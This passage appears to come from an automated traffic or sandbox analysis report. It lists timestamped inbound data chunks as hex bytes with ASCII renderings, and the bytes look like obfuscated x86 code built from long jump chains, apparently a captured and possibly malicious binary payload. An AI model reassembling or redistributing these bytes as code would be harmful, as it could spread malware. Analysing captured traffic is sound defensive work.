                                                                              Data Ascii: {Dy!l\(E5oNnTnmGX^i42q?'O`~ZF[Oiu6o\@KW7&9jA3i$Ie'dMJba}f\{Xf^8Wx\oQb|,P7$N
                                                                              2022-06-01 23:53:42 UTC225INData Raw: 01 15 e9 5a fe ff ff fb 9c d0 d3 e9 73 02 00 00 fc 81 77 4c a2 04 ca b0 fb c8 b4 68 39 61 80 ef fa 63 ed b2 24 27 0f 31 ea d4 0a e9 ae fd ff ff 6e 45 be cd c3 2b 46 73 58 01 cf 73 47 28 ac e9 dd 00 00 00 cd b7 bb 56 d3 47 c5 1f e2 25 80 e9 a6 fb ff ff f9 0e 04 c9 ee 7c fc 5f 05 e9 46 fe ff ff 2d 87 ac 28 45 87 32 62 ed 8f ba e9 7c f8 ff ff 58 49 22 82 20 b7 13 02 cf 9c 1d 2d 97 d0 09 ae e9 fe fc ff ff 40 5b c1 3f 5c 11 e8 4a 4c 75 86 f0 fe 87 11 aa aa d2 a6 0d 5c bf e9 3a ff ff ff cf 4a 85 b3 ed 41 de d4 b3 a6 45 30 08 4f 9f c5 f0 2f 3d e9 af fe ff ff f8 92 1d 04 98 58 0e 43 01 cd 41 01 2c 03 7f 96 af ad b2 e9 48 fc ff ff ea 7c 7a 18 24 89 bf 86 8b f8 48 b6 64 18 e7 7e ee e2 c4 86 14 e9 42 fc ff ff 9f 06 d0 db ce 81 5c 35 d8 1f b8 67 54 0c d3 a5 2a 17 5e
                                                                              Data Ascii: ZswLh9ac$'1nE+FsXsG(VG%|_F-(E2b|XI" -@[?\JLu\:JAE0O/=XCA,H|z$Hd~B\5gT*^
                                                                              2022-06-01 23:53:42 UTC226INData Raw: c6 eb 95 28 f6 cb 76 b7 c5 e9 65 10 00 00 54 09 3d 25 d9 34 90 1c 84 bf 39 a4 a6 12 97 ee 0e 3c e9 e8 09 00 00 af a8 8f 5b 8b 85 d0 9c e9 ab 09 00 00 d5 26 69 6d 60 52 46 92 16 99 1e ea 62 9c 11 72 a3 62 e2 45 3a 2e e9 84 07 00 00 38 e2 46 5f e9 aa 0b 00 00 5a 2e 7f c7 a8 bf e9 fd 05 00 00 b1 70 3b 50 67 cf 2a b8 c9 e9 37 0e 00 00 4f 3a f2 5b 80 0d 5a 51 ed 15 d0 12 b1 9c 78 eb 2c dd ac 30 be 2a 96 82 e5 36 43 16 8c 9c 47 95 06 72 e9 48 02 00 00 04 58 1a 06 9d e2 97 e7 7b 42 29 eb 12 12 30 e6 d8 5c 2b c7 b7 9c e9 c2 07 00 00 ed b9 ae ac e9 fd 00 00 00 49 db 02 46 e9 1f c3 85 6c 20 c3 e9 87 0b 00 00 23 14 58 80 39 4e 2d 25 84 25 a8 9f e5 f4 cd 7a 3e b8 ed ed e9 5b 0d 00 00 6f 6a 51 86 0a f0 cb 32 e9 24 3e ac 87 a3 7e a4 0f 39 e9 1f 05 00 00 b3 d9 fb f0 27
                                                                              Data Ascii: (veT=%49<[&im`RFbrbE:.8F_Z.p;Pg*7O:[ZQx,0*6CGrHX{B)0\+IFl #X9N-%%z>[ojQ2$>~9'
                                                                              2022-06-01 23:53:42 UTC227INData Raw: 6f 81 ab fb e5 08 64 e9 5a 03 00 00 12 b9 f1 f9 14 c4 fe cb 8c 83 be 30 c5 7c 37 33 0c ae ac e9 19 06 00 00 e3 68 3a f0 52 c8 d3 5f 4a ed 63 d9 e9 62 09 00 00 f2 1e 99 eb 0a 2b 5a e4 91 06 a1 66 77 9d b2 03 65 47 d2 b8 db c9 34 ee 09 d0 d2 53 18 19 eb 22 2d 99 8f e2 7c e9 74 09 00 00 70 91 93 77 73 b4 9d c6 24 4f 4f b5 21 a2 ad e9 73 fa ff ff 8c a8 64 a5 e9 ec fd ff ff f8 c0 77 fb c8 bd 2c d8 b7 8b 82 2b da b5 08 cf b2 68 e9 8c 05 00 00 b9 81 54 90 0f de 57 1f 9b 25 59 4e 07 65 40 cd c8 fc 0a 2e 9a e9 f1 03 00 00 c8 24 b4 63 ee f9 98 97 0e 43 e9 0f fa ff ff 91 06 ae 10 40 79 55 13 95 9a 30 f1 c0 c2 04 82 0b e9 06 03 00 00 2d 81 3d a9 16 29 61 48 c3 30 b3 38 49 9d 20 22 51 e4 14 5c 86 db 96 e9 a5 fe ff ff ed a7 ae 6b 76 15 8d 42 6b f4 11 83 19 a5 e9 f8 05
                                                                              Data Ascii: odZ0|73h:R_Jcb+ZfweG4S"-|tpws$OO!sdw,+hTW%YNe@.$cC@yU0-=)aH08I "Q\kvBk
                                                                              2022-06-01 23:53:42 UTC229INData Raw: 11 f0 d3 9a 27 6f 1d 88 5a 25 c4 8a 66 ea e9 ba f6 ff ff 79 74 ec 71 d2 fa da e9 89 00 00 00 7d ec 23 4b 10 7f b9 0b 2d db 0d d7 d2 eb 44 86 29 e8 4f e7 45 9c 1e af a7 0f 15 dc 54 82 bc 0b c4 e5 95 69 22 e7 3f ee 28 2a fe ab 70 5b e9 6a fe ff ff 42 73 77 ae 02 f8 83 b5 31 d4 ea f8 ab 06 89 aa 46 df 74 c7 e9 bc fe ff ff 18 ea 11 18 76 2c e3 e9 38 f7 ff ff 0d 2d 61 f3 2c 07 c5 70 f5 fd 57 e9 96 f9 ff ff 99 ed 13 7e 61 1b a7 74 54 61 89 e9 f9 f6 ff ff 51 06 35 e4 6c 57 a8 1c c5 da 53 12 bb 0c ae 4f 8f e9 9a f2 ff ff 36 1e 04 62 4c 0f 3f 42 0f 65 a7 3c b3 3b 76 6c e9 6c f6 ff ff d6 d3 65 28 fa 78 b4 72 5b 3b d8 b0 fa 49 df 9d 0b 68 6e a9 3d ab c3 fe c8 e9 a1 f9 ff ff 6d d9 e1 04 d0 e6 c2 94 7b 21 67 62 8b f2 e9 6c f7 ff ff 94 76 1d b2 80 1b 46 4c 3c 95 d4 8b
                                                                              Data Ascii: 'oZ%fytq}#K-D)OETi"?(*p[jBsw1Ftv,8-a,pW~atTaQ5lWSO6bL?Be<;vlle(xr[;Ihn=m{!gblvFL<
                                                                              2022-06-01 23:53:42 UTC230INData Raw: 31 ab c4 bd 00 d2 c5 4f ec 44 e9 82 fe ff ff 2d d0 b8 8b 31 9c d8 0c a5 9b a2 d1 7d d8 df e9 f5 f3 ff ff 34 4f 35 6c d8 a3 b9 58 a1 e9 9a 05 4b 5d 4d b4 20 68 88 d6 39 c2 fd e9 89 fb ff ff 3d 7e 93 c9 8b 0f 0a dd 4b 68 62 f3 e4 53 e9 66 fa ff ff e4 41 12 68 56 43 69 ed 04 19 0d 64 63 70 1b 27 bb e9 27 f7 ff ff 51 7e 5b ef 5c 58 ee 8b 45 f8 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 51 e9 ff 0e 00 00 e9 10 08 00 00 bf 8a 3e 54 c4 38 99 09 59 01 ce 4c 3c 86 24 40 c7 90 b1 e9 80 0b 00 00 2a 82 78 8e 08 e9 85 0e 00 00 60 7f 99 40 9e 08 25 70 d5 78 0f 11 bf a5 9d 5c bc 80 ed b9 f3 66 e9 36 06 00 00 59 56 4f 78 2d 0d a8 4c 6b f0 89 af df 22 c6 2f 0d 66 4e 4d e2 8f 72 44 6c 87 74 96 ab 27 95 c7 6f e9 bc 09 00 00 f4 5c 9f fa 9b d9 ec c0 51 84 cf e3 5a d8 f4 42
                                                                              Data Ascii: 1OD-1}4O5lXK]M h9=~KhbSfAhVCidcp''Q~[\XE]UQ>T8YL<$@*x`@%px\f6YVOx-Lk"/fNMrDlt'o\QZB
                                                                              2022-06-01 23:53:42 UTC232INData Raw: 00 00 17 cd ea 42 ed 11 88 79 3b 7b d6 b7 b7 8a ae 47 06 92 24 e9 0b fd ff ff f7 d9 1a be 86 a7 c3 4a c0 e9 c2 00 00 00 6f cc 09 7e 25 99 b8 0c 51 e8 f0 84 e9 76 06 00 00 07 82 bb d1 7a 59 67 f3 f0 a9 de 57 b2 32 66 76 c8 02 fa 68 c7 e9 ad 05 00 00 91 59 2b 02 5e 17 18 ca c3 f9 c0 c4 8d 69 48 bd d0 c4 e9 69 06 00 00 0d e0 b9 b8 92 f1 c3 67 40 6c f8 5d 61 2d f1 68 c6 b6 19 07 e9 59 02 00 00 ae e2 6f 8b 57 31 16 b0 55 e9 e9 0a 00 00 e9 be 80 67 ed b3 75 e0 61 15 31 c5 e1 79 2a e9 ac 00 00 00 c2 04 6f da 56 e9 a5 0b 00 00 9c a2 ba 34 4f 40 d0 d5 3c a6 0d 13 71 3e 5a 18 e9 04 f6 7b 7c e9 23 0a 00 00 a7 54 d8 ca 18 50 b4 b2 49 c1 c9 81 ea 7c 12 25 f7 6b 1c 64 8e fe e9 ae fd ff ff a7 00 e1 c6 58 92 e9 79 fe ff ff 46 1c 8b 89 44 ec 29 54 2c 15 8a f3 e6 9b 7f 46
                                                                              Data Ascii: By;{G$Jo~%QvzYgW2fvhY+^iHig@l]a-hYoW1Ugua1y*oV4O@<q>Z{|#TPI|%kdXyFD)T,F
                                                                              2022-06-01 23:53:42 UTC233INData Raw: e9 9c f8 ff ff e0 cc 10 dc 80 e0 5e 71 f3 89 ed bf 42 2f c1 d2 25 0d b2 e9 f4 06 00 00 bc 8f dc 58 7f f6 ab 17 79 f5 e3 b3 2e a9 20 90 db cc 5e e1 e9 32 fd ff ff 3a a3 41 e2 b9 c4 52 ed 0f 1c 8d 55 1c b2 23 89 ec a9 e9 44 01 00 00 b5 99 bb 95 1f 35 ae a5 e3 69 b0 0d 5c 94 e9 a0 05 00 00 cd 19 34 5c 5d 69 27 a9 a7 d5 72 e9 47 04 00 00 40 5e dd 69 d1 3f 10 0d f5 43 8b 99 b0 f5 76 26 e9 48 f6 ff ff f9 0b 50 5c fe 34 ab 61 f8 98 81 40 d4 7b b5 12 25 16 02 a4 e5 8b 65 04 93 e9 14 f6 ff ff de e9 08 df f9 e9 e8 fd ff ff 3d 84 c1 82 97 3a 47 65 c4 51 9a dc d6 46 e9 bc fb ff ff 21 aa b8 e7 95 e2 74 2a bf 55 bd ca 50 a0 51 85 75 76 8f e9 00 06 00 00 97 f6 53 6b 1a 8e 98 6a 06 03 27 20 9c 09 00 e9 ce 06 00 00 14 13 25 ea 38 6a 15 e0 e7 e9 27 03 00 00 70 8b 66 5c 92
                                                                              Data Ascii: ^qB/%Xy. ^2:ARU#D5i\4\]i'rG@^i?Cv&HP\4a@{%e=:GeQF!t*UPQuvSkj' %8j'pf\
                                                                              2022-06-01 23:53:42 UTC234INData Raw: 76 b5 e9 7a 02 00 00 dc 69 d8 1c 73 4a d8 b5 14 3f c4 be 4a a2 42 33 e9 5b f2 ff ff 85 26 fc 12 0e 0d 88 9b bc 82 4c 52 e9 74 f5 ff ff c6 80 f3 15 61 a8 a1 39 b1 24 97 b0 e9 e2 f8 ff ff 85 b0 ab be a0 58 26 eb f8 44 b8 4a 48 e4 5c 05 79 6e 64 b4 e9 00 df 8b 37 9e 6c e9 12 ff ff ff 69 66 12 90 aa 79 2e 0d 3a da e9 53 f7 ff ff 1a 68 0e f5 57 71 c2 e9 2d 01 00 00 fc a2 59 55 65 5c 2a 64 91 e9 79 fd ff ff 4e fd 03 99 53 08 6b 7b bc 76 86 ba eb ed b0 ca f1 de d0 ac e7 a7 a1 e9 b3 f3 ff ff 5d f0 ae a6 1a 69 28 69 63 9d 80 58 f0 96 2e ed c2 a4 bf e9 0b fb ff ff ea e8 fa 2b 03 4c ef e9 7c f6 ff ff 68 78 57 f8 2a 6f c5 56 e9 16 fc ff ff 53 b1 97 5c c4 93 e1 fd 21 70 68 3c 79 77 e2 2b 6d ef 51 d0 1b e9 e1 01 00 00 95 7b c2 a1 f1 30 9b bf d8 d0 5f e7 27 be 93 a0 43
                                                                              Data Ascii: vzisJ?JB3[&LRta9$X&DJH\ynd7lify.:ShWq-YUe\*dyNSk{v]i(icX.+L|hxW*oVS\!ph<yw+mQ{0_'C
                                                                              2022-06-01 23:53:42 UTC236INData Raw: e9 13 08 00 00 a6 00 ee 92 c7 8c 47 08 24 b3 d3 46 90 48 6c 66 fa 5b 96 2b 15 ba 25 b9 34 eb 10 38 6a c6 4a f0 3b db db c5 a6 f1 4b 9d da 03 0f e9 c8 01 00 00 a2 dd f4 bd 40 42 73 04 9f dd f0 d7 d2 a1 b9 ad e9 1c 01 00 00 74 39 5c c5 e2 26 bd 45 45 4e 94 4b 57 06 f5 51 2c fe ca 43 e9 0f 03 00 00 a3 a4 7c c4 f0 8b e4 19 e2 9e d3 51 99 fc 9f e9 4b 03 00 00 1e 18 4d a3 a7 94 e9 61 02 00 00 c5 46 e5 e7 a4 43 bc 17 17 bc 79 32 93 45 c9 89 ec 98 94 43 23 79 d4 90 8c 90 d7 e9 16 0a 00 00 58 7a 1a a8 ad 04 88 a9 e9 6f ff ff ff 57 c1 f3 f6 3a b1 65 66 90 72 19 73 76 03 79 e9 3e 07 00 00 e2 3a 01 7b 99 51 8d 4b e9 f5 6a f0 2d 47 28 26 33 ce 2b 64 14 d7 c6 e5 2b 18 e9 35 0a 00 00 0f aa fd 9f ca 3d 76 5f e7 53 85 8e 5a e2 c4 a4 f2 23 23 2c c3 48 9a 50 85 42 c4 fc e9
                                                                              Data Ascii: G$FHlf[+%48jJ;K@Bst9\&EENKWQ,C|QKMaFCy2EC#yXzoW:efrsvy>:{QKj-G(&3+d+5=v_SZ##,HPB
                                                                              2022-06-01 23:53:42 UTC237INData Raw: ff 32 cf 45 01 2e 89 ae 60 5e d9 67 52 b1 13 19 af 60 4c 80 54 7d 3a a0 8f 15 25 e9 0d 04 00 00 d0 85 5c ec 5a d5 dd 7b a8 68 01 f0 dd ea 6a b3 8d 8e c6 23 67 22 eb a9 f2 4e 1f 95 26 10 14 8a 23 ca a2 f6 36 c2 35 c0 da e9 3a f9 ff ff 0f b4 23 75 22 47 f0 5b 12 67 00 65 5e e9 91 e9 46 01 00 00 21 09 3a e1 8e 8a 69 0e 12 50 45 4b 43 d7 7a ef 1f eb 2b aa 1d d3 b0 93 f6 ec d5 ab 53 ac 1e 04 f5 5a b4 5d 63 f4 7b 94 b7 4c ea a3 43 ca 79 c8 1c 39 7c bf e9 28 03 00 00 24 eb f3 d4 10 e9 60 05 00 00 e9 aa 87 f8 e7 4e 20 9b 44 e9 5d fa ff ff 60 0a c5 b7 4f f5 68 20 50 de 7e 9f 21 78 d1 86 86 a2 df e4 cf a9 f1 e4 00 e9 11 fc ff ff a9 13 03 af ee eb f6 65 76 2c 1e 34 fa 50 eb ef bd e9 15 fa ff ff 2b 51 de b9 73 da 06 74 3f f8 fb e5 4f 49 fd 20 e9 3a 25 4d 64 c0 20 e9
                                                                              Data Ascii: 2E.`^gR`LT}:%\Z{hj#g"N&#65:#u"G[ge^F!:iPEKCz+SZ]c{LCy9|($`N D]`Oh P~!xev,4P+Qst?OI :%Md
                                                                              2022-06-01 23:53:42 UTC238INData Raw: 3d 02 27 02 c0 ed 3e 83 55 b9 15 86 72 e9 74 01 c0 b1 4b 7f 01 0c 65 a5 be e9 d7 00 00 00 66 6b 89 a3 e9 2a fa ff ff ce 36 21 b6 a3 1e f1 2b a5 f7 49 ba f4 d5 d5 18 d8 7d 91 9f e9 c8 22 e9 d6 f6 ff ff 99 25 96 36 52 02 87 61 7b 76 a9 b2 dd a2 98 0b e9 c9 fd ff ff 25 15 43 fb 5a aa 77 19 90 b8 75 a9 6a e9 00 fb ff ff 08 54 c1 6b fe 6f 74 f7 c3 e9 80 fb ff ff 65 89 07 51 6c 91 44 10 52 e9 93 f5 ff ff e8 0c 1a 20 43 7c e5 3f 62 f0 38 89 08 c1 f9 86 48 1e 59 6e e9 fb f9 ff ff 51 34 dc 04 e9 0b fb ff ff ad 61 52 14 ad 7a 1a a9 33 64 44 e9 0f f9 ff ff cf e6 55 2a bd 5a 11 8e a5 4c c1 f0 2d 17 fd 50 a1 90 6b e9 85 f5 ff ff fc eb cd 29 93 c8 3a 60 2a af ca 7f 1e 00 e9 8f f8 ff ff b2 78 b9 26 e8 77 e9 ff f8 ff ff 83 34 15 41 66 bb f2 e9 69 f3 ff ff 29 f6 15 e0 4f
                                                                              Data Ascii: ='>UrtKefk*6!+I}"%6Ra{v%CZwujTkoteQlDR C|?b8HYnQ4aRz3dDU*ZL-Pk):`*x&w4Afi)O
                                                                              2022-06-01 23:53:42 UTC240INData Raw: e4 e9 e8 04 00 00 23 75 41 7c 6f 24 f0 e5 86 d2 86 1c 1d 77 7f e5 e9 bc 05 00 00 a8 f1 84 88 dc 46 42 32 a1 69 1c d5 a1 a8 e4 99 0b 47 f3 02 e9 2e 07 00 00 79 5d 38 23 c6 f0 07 20 c6 e8 d8 be cc 1c e9 7c 4f a1 78 68 84 1e a8 03 26 2d 18 70 e8 e9 45 07 00 00 a9 f5 ea 0f 3e 41 71 29 e9 35 01 00 00 71 ac 8a 06 ad c8 57 f5 4b 01 0f de cf 32 6c b0 7a e9 17 ff ff ff 69 37 fc 0e 1a 64 6f bf c5 7e 3d 13 e9 cf fd ff ff 8e de 94 4c 3e 16 a0 e9 12 05 00 00 01 c3 6b c1 ac ea fb 3a 47 58 cd 49 6b e9 f8 fc ff ff 31 a9 25 df 47 bf e5 86 5d 14 b3 e9 20 fd ff ff ce 48 cf ac e6 4e da e9 06 ff ff ff c5 1b f1 87 71 47 ea 56 da fa 35 8d e9 6e 02 00 00 9a d7 96 ab da 72 6f d4 39 f4 d4 62 8a 63 28 e8 e9 a8 fc ff ff b7 50 60 64 cc f7 92 1a 93 05 87 d8 47 23 cb e9 df 00 00 00 f8
                                                                              Data Ascii: #uA|o$wFB2iG.y]8# |Oxh&-pE>Aq)5qWK2lzi7do~=L>k:GXIk1%G] HNqGV5nro9bc(P`dG#
                                                                              2022-06-01 23:53:42 UTC241INData Raw: c5 c4 eb 0a f5 fd 4c e9 b9 fe ff ff 73 02 30 54 d5 ca f7 c1 e9 1f f9 ff ff 28 32 ba 26 f9 d5 23 4a f7 49 53 e9 01 fe ff ff 71 ee 20 11 33 43 2b a4 91 11 a5 22 d5 56 34 62 1d c0 ca 06 e7 a1 de 1f 53 eb 04 c8 d4 f2 3c e9 92 fa ff ff 57 32 73 0f 1b ec d5 4d da d2 60 ab e9 53 02 00 00 99 47 cc 8e 65 d5 e6 01 ad 8b 5d 91 c6 e9 64 fd ff ff 68 3e 66 fa b8 76 bd 23 a6 7c d5 ec 85 bb a5 bf b4 26 e9 94 f9 ff ff 11 4a 11 24 8b e6 82 10 23 97 8b 46 98 27 e9 16 f8 ff ff 99 37 49 07 08 88 7b 51 27 a6 e8 bb d5 9f d5 dc e9 50 01 00 00 f2 07 26 55 17 76 6f 76 9e 10 57 09 e9 21 ff ff ff 3c f3 5b e6 ab 08 25 eb 74 50 d0 45 66 29 36 cb c4 e7 05 89 2a 64 a6 88 a9 6e 2f 88 c4 d5 e9 8d fc ff ff a9 d2 c7 ed 4d 17 ee 16 e9 d6 fc ff ff d6 00 89 72 6f 0f 37 13 96 95 72 dc 4d 59 c7
                                                                              Data Ascii: Ls0T(2&#JISq 3C+"V4bS<W2sM`SGe]dh>fv#|&J$#F'7I{Q'P&UvovW!<[%tPEf)6*dn/Mro7rMY
                                                                              2022-06-01 23:53:42 UTC242INData Raw: 02 00 00 79 b7 6a fa d2 e0 de 88 e9 31 ff ff ff a4 0d cb 6c 2f 49 22 3b e9 51 91 15 b8 43 4e 83 82 a1 05 ac 4b e9 09 01 00 00 25 6e c1 e3 d5 40 8d 78 d0 d7 93 24 a6 ca e9 d7 fe ff ff 8d 77 d9 e1 49 ed a5 ec 49 d0 a4 78 72 ef ce e9 7d 03 00 00 da 87 c8 b8 ad 8d e8 3c 86 5d 33 85 b1 04 e9 09 01 00 00 fe 7a 06 97 65 79 5f f5 54 88 b9 55 ac e0 bf d3 b3 ae 12 e1 a3 21 e9 49 fe ff ff cc d5 af 65 ce 95 09 be 4b ce b5 de b4 eb 2f ac 91 48 8d 73 bb 38 48 07 41 e9 6f 02 00 00 23 57 51 2c f3 d9 50 c7 8e bb b2 26 4c e0 f5 5a fb 88 e9 d6 01 00 00 77 80 ec a7 65 b5 a7 cb 8b e9 7e fd ff ff 7d 24 df fa 08 ad 2f 02 55 1a ca ad ae ed 5e eb 53 8e 53 a0 f0 9e b7 86 a5 76 71 0d 19 0c d0 bd 7a e9 6c 01 00 00 7d 8f 1a 78 67 34 c1 28 fa a0 17 8f 15 eb 43 24 79 08 16 5b f7 a5 e9
                                                                              Data Ascii: yj1l/I";QCNK%n@x$wIIxr}<]3zey_TU!IeK/Hs8HAo#WQ,P&LZwe~}$/U^SSvqzl}xg4(C$y[
                                                                              2022-06-01 23:53:42 UTC243INData Raw: 03 fd 26 27 6e 20 8f 80 89 a4 2e 79 5c 43 7f 1e 3d a1 39 6d 4a bf b3 31 89 e9 e5 fe ff ff 99 5d d3 dd 62 70 d2 62 c1 e3 dc 24 ee fe 2b 06 72 84 df cd 5b 0b d9 eb 50 6e a5 e1 e9 4f 02 00 00 e4 64 71 cf 44 f7 8c 9c 50 ae cc 5a 24 d4 4e 0f 5f e9 81 06 00 00 6d 87 d8 33 5c bf 59 02 16 bb 46 e2 56 ac bc fe 7a e9 80 fe ff ff 4c 61 2d 08 8c 56 50 32 c5 1d 10 a1 5a 5d 34 06 59 b4 b4 8d 3e 56 fe e9 79 01 00 00 88 2f 15 4c c6 cd 9f 30 96 0d ac a5 68 e9 18 ff ff ff 74 2f 93 31 4c e9 4b 02 00 00 ef 0d ec e5 ec 0d be f0 ae e4 cf e9 a8 03 00 00 d6 97 3a 6e e2 da 22 28 3f 88 a3 1a fa 75 e2 18 ef 35 e9 08 05 00 00 5f bb b6 d2 b6 cc 47 8e d7 6f 27 e9 07 05 00 00 ad 82 a9 7c dd 54 b1 a8 3d 8b d1 fa c2 a4 e9 bf 02 00 00 c5 2d 12 92 ae f4 fd 75 c4 79 0a 0a c5 05 e6 20 64 17
                                                                              Data Ascii: &'n .y\C=9mJ1]bpb$+r[PnOdqDPZ$N_m3\YFVzLa-VP2Z]4Y>Vy/L0ht/1LK:n"(?u5_Go'|T=-uy d
                                                                              2022-06-01 23:53:42 UTC245INData Raw: 92 93 4c 11 e9 54 fd ff ff 71 0f 7f 5e bd 54 01 71 62 8f 3b d2 e9 f4 fe ff ff 5a 14 d3 58 03 c2 49 c3 97 10 0c bb d4 d3 9a b8 fa 25 e9 32 fb ff ff 03 8a f1 2d 82 42 87 ca 5e c8 f1 e9 d6 9b cb 61 be 93 e9 ea fa ff ff b7 93 72 d0 b3 c1 32 42 9c 97 4b a7 3f 9c 06 e9 a6 f9 ff ff 10 3e 89 d8 17 ab 37 fd 48 df 50 03 93 32 90 1a a7 b1 f3 b8 e9 f0 fe ff ff d9 e5 02 87 48 96 e8 14 04 18 e9 2a fb ff ff ec fd 7a 27 a4 65 5e 7b 99 00 0d 60 65 a4 63 e2 23 eb e9 53 01 00 00 7e 6d 69 01 6c 17 a5 80 57 a4 e9 ff fd ff ff b9 5d 73 6f 95 89 35 0a 4a a3 51 33 04 84 87 bc 1c c3 0f f4 90 d5 8d 6f 76 0d 01 29 89 84 2f e9 bf fd ff ff c9 42 c9 40 74 b3 e5 cd c9 34 02 e4 7a 03 3e 3e 81 0b 4a a5 36 e9 48 01 00 00 29 d1 9d cf 67 23 0c fc 87 00 22 f4 b8 e9 57 fe ff ff b3 a7 b3 25 f7
                                                                              Data Ascii: LTq^Tqb;ZXI%2-B^ar2BK?>7HP2H*z'e^{`ec#S~milW]so5JQ3ov)/B@t4z>>J6H)g#"W%
                                                                              2022-06-01 23:53:42 UTC246INData Raw: 45 49 c6 bb f3 10 75 21 e5 3b e9 fb 09 00 00 8d 03 32 35 15 2c 45 c8 a4 4f 04 3f fc e9 e7 06 00 00 00 ad 9d eb cf 6c ae 33 4c fd 12 b0 f8 46 11 2b 2e 35 67 8e e9 43 06 00 00 d1 82 4a 44 9d f3 d3 a7 6b b1 74 39 13 df 09 aa f6 3f 2e e9 8b 0a 00 00 4b a6 a2 5a c1 53 4e 74 2c 67 e3 f3 26 9e e9 fb 05 00 00 cc a6 a3 8f 32 e2 0b c1 7a 78 f1 9f e4 8b e9 be 04 00 00 4c 97 5c 45 98 75 16 29 6b 9f 10 ea 82 e9 22 07 00 00 a7 7c d9 ec 3a 63 29 08 b1 e9 fc 05 00 00 db 76 79 ea ce 70 d0 3b cb ce 61 13 37 e9 5f 05 00 00 76 07 38 e3 9e 9d e9 0b fe ff ff ed 1d c9 92 ed 3c e2 3d 06 09 c6 27 d7 4d 24 6b 19 ac 0b 24 74 87 ca eb e2 ba 7a a9 90 78 56 91 a5 51 0e fc 81 37 ac f9 51 d3 91 a8 e9 f1 04 00 00 98 c2 3c 63 ce 93 60 56 00 d1 46 93 8c 5a ad 5f 4d 74 3a 45 d2 dc 65 f0 7d
                                                                              Data Ascii: EIu!;25,EO?l3LF+.5gCJDkt9?.KZSNt,g&2zxL\Eu)k"|:c)vyp;a7_v8<='M$k$tzxVQ7Q<c`VFZ_Mt:Ee}
                                                                              2022-06-01 23:53:42 UTC248INData Raw: e1 0e e9 e9 12 f9 ff ff 83 56 3e 26 8a 18 8d 9c d7 09 5d ca f1 78 21 5b 6e ce 98 33 97 8b e9 c9 fc ff ff eb 98 cf ce 68 51 e9 ed fc ff ff af 54 9a 72 f5 5b 45 46 13 a4 b4 eb af df 51 8b 05 7d ad ba b5 c3 42 7f 62 2c 3e 5a 43 a9 73 48 e5 f0 dd e9 65 ff ff ff e9 8e 18 24 10 a2 c6 03 af cf 79 61 d5 e9 41 06 00 00 b2 03 5e f2 fc f8 cb c1 ba 43 db 2d 43 e9 83 fb ff ff 1d 28 86 58 e0 a6 61 1c e9 fb f8 ff ff b5 04 b6 a6 91 aa 63 b2 89 cc be 36 ad 8b e9 6c fc ff ff e0 bf 59 41 59 98 23 80 9f 49 f2 fd 30 e9 01 02 00 00 ca a8 4f 3f dc f2 37 47 6e 52 7c c4 e9 ba 01 00 00 41 98 ae ab 46 76 8e ed 44 c1 73 82 a7 1b 78 15 9a 0d a6 2d 47 f0 cf de 64 38 eb a9 61 2f eb 1f cd 7f aa 1b 7a 9d 47 ae 87 29 2f c0 03 38 dd b9 0e e9 c3 05 00 00 f8 99 68 af 7b 9b fb 0e 10 6f 55 e9
                                                                              Data Ascii: V>&]x![n3hQTr[EFQ}Bb,>ZCsHe$yaA^C-C(Xac6lYAY#I0O?7GnR|AFvDsx-Gd8a/zG)/8h{oU
                                                                              2022-06-01 23:53:42 UTC249INData Raw: ff ff bd ae 15 36 26 a1 8c 57 eb 5c f3 41 4a 2f cf 46 79 f6 54 6f 51 c1 20 e9 3f 01 00 00 d4 15 a3 5b ba 94 e8 9b b7 27 52 00 c3 4c 69 f4 4a 59 ba e9 f2 f7 ff ff 79 71 a6 26 33 45 5b 52 2a db bc a6 f6 46 eb bf 95 ac e0 58 9d 19 23 99 f7 2e de e3 76 43 78 99 e9 b8 fe ff ff bc 0d c1 bb 62 5c a7 3d ef 63 d3 ba ce e9 ed f6 ff ff 2b 00 c5 09 45 0a f5 57 32 5b db e9 5e fe ff ff 87 36 21 b8 7b 45 18 08 74 51 a4 f8 83 2d e1 4a 25 77 8f e6 8b 8e b0 3f e9 4f f9 ff ff f0 2f 0c a1 c8 a4 30 08 d4 46 36 e9 60 f7 ff ff b6 6c 56 ba 3c 5e 8b e4 cb fd 65 6e 26 2e 77 2f e9 78 9f 4a 0d 68 d0 7c ef 79 e9 38 f4 ff ff 40 75 11 d0 df 43 6c e9 60 fd ff ff a0 78 8a b7 d7 89 09 ea 7e b9 50 e9 f0 f6 ff ff 8e 79 2d 24 64 5a 98 f7 a1 a2 ee 3e 53 03 c8 5b 9e e8 11 8a b3 24 ae 51 86 18
                                                                              Data Ascii: 6&W\AJ/FyToQ ?['RLiJYyq&3E[R*FX#.vCxb\=c+EW2[^6!{EtQ-J%w?O/0F6`lV<^en&.w/xJh|y8@uCl`x~Py-$dZ>S[$Q
                                                                              2022-06-01 23:53:42 UTC250INData Raw: 94 00 00 00 93 26 7c 67 21 53 0d c4 e9 8d fd ff ff 12 f6 dd e3 a9 30 3f 09 e9 fc 00 00 00 89 02 03 80 f5 f5 ea b5 6c 33 e9 cb 03 00 00 b5 41 d1 36 e0 49 92 8e e9 ab 01 00 00 0f 75 e6 ed be 7a d2 d5 f3 96 3c 8b 7d e9 e5 01 00 00 ab 57 27 5a d4 31 17 41 bd 12 e9 50 fe ff ff 73 9d f6 d4 d0 d4 4d 10 93 d2 35 e9 47 ff ff ff c2 7e f9 cd 6b e9 24 08 00 00 37 b8 2f 84 03 5b c9 30 29 3e 1b 32 af dc c1 e9 16 fc ff ff 69 64 0f 23 dd c0 fe 09 5b 6f 25 6f c4 dd b5 e9 c8 fd ff ff b1 c9 31 06 fe e9 f5 08 00 00 5f 5a 32 a6 81 51 77 5a 44 ce 6d 47 e9 ca 08 00 00 34 d6 54 70 e0 cb 4e 68 f1 99 a1 b4 ce e0 a1 99 4b fc cf 2c df 95 8e e9 73 06 00 00 a3 4a 2f ae e1 01 92 41 0b 6f d4 69 7c 32 e0 45 aa 3d 56 69 9b eb 75 3f f4 9f c3 3c fb 04 02 c5 2f 25 b9 c6 77 af c0 b4 29 87 91
                                                                              Data Ascii: &|g!S0?l3A6Iuz<}W'Z1APsM5G~k$7/[0)>2id#[o%o1_Z2QwZDmG4TpNhK,sJ/Aoi|2E=Viu?</%w)
